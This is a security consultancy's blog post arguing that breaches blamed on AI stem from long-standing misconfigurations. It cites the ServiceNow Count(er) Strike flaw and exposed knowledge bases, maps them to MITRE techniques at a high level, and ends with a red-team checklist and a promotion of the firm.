AI Didn't Breach You. Your Configuration Did.
The headlines scream about LLMs launching autonomous cyberattacks. Security teams are scrambling to protect against AI-powered threats. Meanwhile, attackers continue to walk through the same unlocked doors they've used for decades.
"Funny how the old ways still work the fastest." — Chris Nickerson, Lares Co-Founder, Damovo CEO
The Count(er) Strike Reality Check
In July 2025, Varonis disclosed CVE-2025-3648, dubbed "Count(er) Strike", a high-severity vulnerability affecting ServiceNow instances used by 85% of Fortune 500 companies. The flaw allowed attackers to extract sensitive data through record count enumeration. Simple. Effective. Ancient technique.
The MITRE mapping tells the story:
- T1087 (Account Discovery): Enumerate user accounts via API responses
- T1083 (File and Directory Discovery): Infer file contents through count variations
- T1552 (Unsecured Credentials): Extract credentials from exposed knowledge bases
No AI required. Just basic enumeration against misconfigured Access Control Lists.
Configuration Drift at Scale
Over 1,000 ServiceNow Knowledge Base instances were found exposing corporate data. The root cause? Default configurations and poor permission hygiene. Internal system details, active credentials, and PII were accessible through public widgets because administrators never properly configured User Criteria settings.
The attack methodology was textbook:
- Identify exposed ServiceNow instance
- Brute force KB article IDs (KBXXXXXXX format)
- Extract sensitive data through unauthenticated requests
These are the types of attacks Lares' red teams perform regularly. Enumeration, fuzzing, access control bypasses, and data exfiltration are core parts of our assessment approach.
LLM Attacks That Weren't
Recent "LLM hijacking" campaigns sound sophisticated. Attackers are reportedly stealing billions of tokens from AI services. The reality? Traditional credential theft from misconfigured applications.
The actual attack chain:
- T1190 (Exploit Public-Facing Application): Target Laravel framework vulnerabilities
- T1552.001 (Credentials In Files): Extract API keys from exposed configuration files
- T1496 (Resource Hijacking): Use stolen credentials to access LLM services
The "AI attack" was credential stuffing with better marketing.
Testing Your Reality
Your red team should be finding these issues before attackers do. Here's where to focus:
Configuration Assessment Framework:
- ServiceNow instances: Test ACL configurations, knowledge base permissions, API exposure
- Cloud services: Review IAM policies, storage permissions, API gateway configurations
- AI/LLM integrations: Validate credential management, API key rotation, access logging
PTES-aligned methodology:
- Information Gathering: Enumerate cloud services and SaaS platforms
- Vulnerability Assessment: Test default configurations against security baselines
- Exploitation: Demonstrate business impact through data extraction
- Post-Exploitation: Map lateral movement paths through misconfigured services
The Bottom Line
AI isn't breaching your environment. Your twenty-year-old configuration management problems are.
While you're building defenses against theoretical AI threats, attackers are extracting your data through the same misconfigurations that have existed since your systems went online.
Fix the fundamentals first. Everything else is theater.
Ready to test your real attack surface? Lares Red Teams specialize in identifying critical configuration issues before your adversaries do.
References:
- Cybersecurity Dive. (2025, July 28). Research shows LLMs can conduct sophisticated attacks without humans. https://www.cybersecuritydive.com/news/research-llms-attacks-without-humans/754203/
- Fortune. (2025, February 18). AI security risks are in the spotlight—but hackers say models are still alarmingly easy to attack. https://fortune.com/2025/02/18/ai-security-risks-are-in-the-spotlight-but-hackers-say-models-are-still-alarmingly-easy-to-attack/
- Varonis. (2025, July 18). Count(er) Strike – Data inference vulnerability in ServiceNow. https://www.varonis.com/blog/counter-strike-servicenow
- BleepingComputer. (2024, September 17). Over 1,000 ServiceNow instances found leaking corporate KB data. https://www.bleepingcomputer.com/news/security/over-1-000-servicenow-instances-found-leaking-corporate-kb-data/
- NSFOCUS Global. (2025, March 10). The invisible battlefield behind LLM security crisis. https://nsfocusglobal.com/the-invisible-battlefield-behind-llm-security-crisis/
Empowering Organizations to Maximize Their Security Potential.
Lares is a security consulting firm that helps companies secure electronic, physical, intellectual, and financial assets through a unique blend of assessment, testing, and coaching since 2008.
16+ Years
In business
600+
Customers worldwide
4,500+
Engagements